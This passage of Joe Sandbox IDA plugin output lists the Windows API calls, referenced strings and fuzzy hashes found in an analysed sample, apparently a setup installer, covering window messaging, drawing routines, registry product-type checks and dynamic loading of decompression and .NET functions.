                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2222416421-0
                                                                                                      • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                                      • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                                      • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                                      • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                                                        • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                                        • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                        • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                        • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                                                                      • TranslateMessage.USER32(?), ref: 004573B3
                                                                                                      • DispatchMessageA.USER32(?), ref: 004573BC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                                      • String ID: [Paused]
                                                                                                      • API String ID: 1007367021-4230553315
                                                                                                      • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                      • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                                      • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                      • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                                      APIs
                                                                                                      • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                                      • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                                      • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$LoadSleep
                                                                                                      • String ID: CheckPassword
                                                                                                      • API String ID: 4023313301-1302249611
                                                                                                      • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                                      • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                                      • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                                      • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                                      APIs
                                                                                                        • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                                        • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                                        • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                                      • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                                      • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                                      • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                                      Strings
                                                                                                      • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                                      • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                                      • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                                      • API String ID: 613034392-3771334282
                                                                                                      • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                                      • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                                      • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                                      • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                                                                      Strings
                                                                                                      • Fusion.dll, xrefs: 004597DF
                                                                                                      • CreateAssemblyCache, xrefs: 00459836
                                                                                                      • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                                      • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                                      • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                                      • API String ID: 190572456-3990135632
                                                                                                      • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                                      • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                                      • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                                      • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                                      • GetFocus.USER32 ref: 0041C168
                                                                                                      • GetDC.USER32(?), ref: 0041C174
                                                                                                      • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                                      • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                                      • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                                      • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                                      • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 3303097818-0
                                                                                                      • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                                      • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                                      • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                                      • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                                      • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                                      • 6FB62980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                                        • Part of subcall function 004107F8: 6FB5C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                                      • 6FBCCB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                                      • 6FBCC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                                      • 6FBCCB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                                      • 6FB60860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MetricsSystem$B60860B62980C400C740
                                                                                                      • String ID:
                                                                                                      • API String ID: 2995079530-0
                                                                                                      • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                      • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                                      • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                      • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                                      • API String ID: 47109696-2530820420
                                                                                                      • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                                      • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                                      • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                                      • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                                      APIs
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                                      • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                                      • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ObjectSelect$Delete$Stretch
                                                                                                      • String ID:
                                                                                                      • API String ID: 1458357782-0
                                                                                                      • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                                      • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                                                      • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                                      • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 00495519
                                                                                                        • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                                      • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                                      • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                                      Strings
                                                                                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                                      • API String ID: 2948443157-222967699
                                                                                                      • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                                      • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                                                                      • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                                      • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                                                                      APIs
                                                                                                      • GetCursorPos.USER32 ref: 004233AF
                                                                                                      • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                                                      • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                                                      • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                                                      • SetCursor.USER32(00000000), ref: 00423413
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1770779139-0
                                                                                                      • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                                      • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                                      • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                                      • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                                      • API String ID: 667068680-2254406584
                                                                                                      • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                                      • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                                                                      • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                                      • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
                                                                                                      • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
                                                                                                      • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                                      • API String ID: 190572456-212574377
                                                                                                      • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                                      • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                                                                      • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                                      • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                                                      • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                                        • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                                        • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                                        • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                                      • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                                      • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                                      • API String ID: 142928637-2676053874
                                                                                                      • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                                      • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
